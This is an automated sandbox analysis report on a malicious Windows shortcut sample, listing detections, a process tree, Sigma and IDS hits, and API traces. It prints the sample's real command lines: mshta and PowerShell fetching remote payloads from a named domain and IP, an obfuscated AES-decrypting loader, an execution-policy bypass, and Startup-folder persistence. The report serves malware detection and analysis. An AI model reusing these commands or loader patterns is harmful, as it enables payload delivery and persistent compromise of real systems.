Windows Analysis Report
s4PymYGgSh.lnk

Overview

General Information

Sample name: s4PymYGgSh.lnk
renamed because original name is a hash value
Original sample name: f2d11d2f41fe0c5b667ddc0cdde9b149.lnk
Analysis ID: 1577872
MD5: f2d11d2f41fe0c5b667ddc0cdde9b149
SHA1: 56401fcd09bc96c694ed3c7dd5ad94733cd747ae
SHA256: 8c5195f5d2c6f618d5f98a9f32809b5da490cb1c48512d410c1896695fb4d394
Tags: lnk, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Drops script at startup location
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 7684 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7748 cmdline: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7892 cmdline: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 8128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean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fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 2796 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\test.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 1180 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 1532 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1652,i,1199563268995675022,292876181194953866,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • BFmcYQ.exe (PID: 4332 cmdline: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" MD5: 085AE742872C761A3485E075756E4781)
            • powershell.exe (PID: 7636 cmdline: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7396 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • Guard.exe (PID: 5868 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                • cmd.exe (PID: 4092 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 8036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 7768 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 5632 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 8128, Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC, Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution, Author: ditekSHen, Strings:
  • 0x1c326a:$b1: ::WriteAllBytes(
  • 0x1c39be:$b1: ::WriteAllBytes(
  • 0x1d9f5:$b3: ::UTF8.GetString(
  • 0x1e5d0:$b3: ::UTF8.GetString(
  • 0x1f11c:$b3: ::UTF8.GetString(
  • 0x1fe1c:$b3: ::UTF8.GetString(
  • 0x20aa5:$b3: ::UTF8.GetString(
  • 0x23c70:$b3: ::UTF8.GetString(
  • 0x247a0:$b3: ::UTF8.GetString(
  • 0x2574b:$b3: ::UTF8.GetString(
  • 0x6dcef:$b3: ::UTF8.GetString(
  • 0x6de37:$b3: ::UTF8.GetString(
  • 0x7486f:$b3: ::UTF8.GetString(
  • 0x9b014:$b3: ::UTF8.GetString(
  • 0x9bb61:$b3: ::UTF8.GetString(
  • 0x9c8b2:$b3: ::UTF8.GetString(
  • 0x166ce2:$b3: ::UTF8.GetString(
  • 0x16fea7:$b3: ::UTF8.GetString(
  • 0x18f468:$b3: ::UTF8.GetString(
  • 0x1a84ed:$b3: ::UTF8.GetString(
  • 0x1a901d:$b3: ::UTF8.GetString(

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7396, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 5868, ProcessName: Guard.exe
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7396, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 5868, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 4092, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo, CommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7748, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/duydemo, ProcessId: 7892, ProcessName: mshta.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7396, ProcessName: powershell.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean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fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrest
Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7768, ProcessName: wscript.exe
Source: File created, Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7636, TargetFilename: C:\Users\Public\Guard.exe
Source: Process started, Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($VGARXd){return -split ($VGARXd -replace '..', '0x$& ')};$DLBqcOk = clean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fgNcqNX = [System.Security.Cryptography.Aes]::Create();$fgNcqNX.Key = clean('764F4D5163617754716D4B6C6E447878');$fgNcqNX.IV = New-Object byte[] 16;$ckcAaXbLZ = $fgNcqNX.CreateDecryptor();$lGOPfxpiP = [Text.Encoding]::UTF8.GetString($ckcAaXbLZ.TransformFinalBlock($DLBqcOk, 0,$DLBqcOk.Length)); & $lGOPfxpiP.Substring(0,3) $lGOPfxpiP.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrest
Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7768, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 5632, ProcessName: SwiftWrite.pif
Source: File created, Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8128, TargetFilename: C:\Users\user\AppData\Roaming\BFmcYQ.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\BFmcYQ.exe" , ParentImage: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ParentProcessId: 4332, ParentProcessName: BFmcYQ.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/hvshp" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7636, ProcessName: powershell.exe
Source: Process started, Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7768, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, CommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 7684, ParentProcessName: forfiles.exe, ProcessCommandLine: . \*i*\*2\msh*e https://tiffany-careers.com/duydemo, ProcessId: 7748, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8036, ProcessName: svchost.exe

Data Obfuscation

Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4092, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp: 2024-12-18T20:55:34.443305+0100, SID: 2803305, Severity: 3, Classtype: Unknown Traffic, Source IP: 192.168.2.7, Source Port: 49742, Destination IP: 147.45.49.155, Destination Port: 80, Protocol: TCP
Timestamp: 2024-12-18T20:55:34.713269+0100, SID: 2833022, Severity: 1, Classtype: A Network Trojan was detected, Source IP: 147.45.49.155, Source Port: 80, Destination IP: 192.168.2.7, Destination Port: 49742, Protocol: TCP

AV Detection

Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, ReversingLabs: Detection: 33%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.8% probability
Source: unknown, HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: Binary string: dvdplay.pdbGCTL source: mshta.exe
Source: Binary string: dvdplay.pdb source: mshta.exe
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,14_2_00007FF74D0AC7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D072F50 FindFirstFileExW,14_2_00007FF74D072F50
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,14_2_00007FF74D0BA874
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0B6428 FindFirstFileW,FindNextFileW,FindClose,14_2_00007FF74D0B6428
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA4F8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,14_2_00007FF74D0BA350
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0ABC70
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,14_2_00007FF74D0AB7C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,14_2_00007FF74D0B72A8
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exe, Code function: 14_2_00007FF74D0B71F4 FindFirstFileW,FindClose,14_2_00007FF74D0B71F4
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A84005
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8494A GetFileAttributesW,FindFirstFileW,FindClose,21_2_00A8494A
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8C2FF
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,21_2_00A8CD9F
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8CD14 FindFirstFileW,FindClose,21_2_00A8CD14
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F5D8
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_00A8F735
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,21_2_00A8FA36
Source: C:\Users\Public\Guard.exe, Code function: 21_2_00A83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_00A83CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, Code function: 27_2_00F74005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,27_2_00F74005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, Code function: 27_2_00F7494A GetFileAttributesW,FindFirstFileW,FindClose,27_2_00F7494A
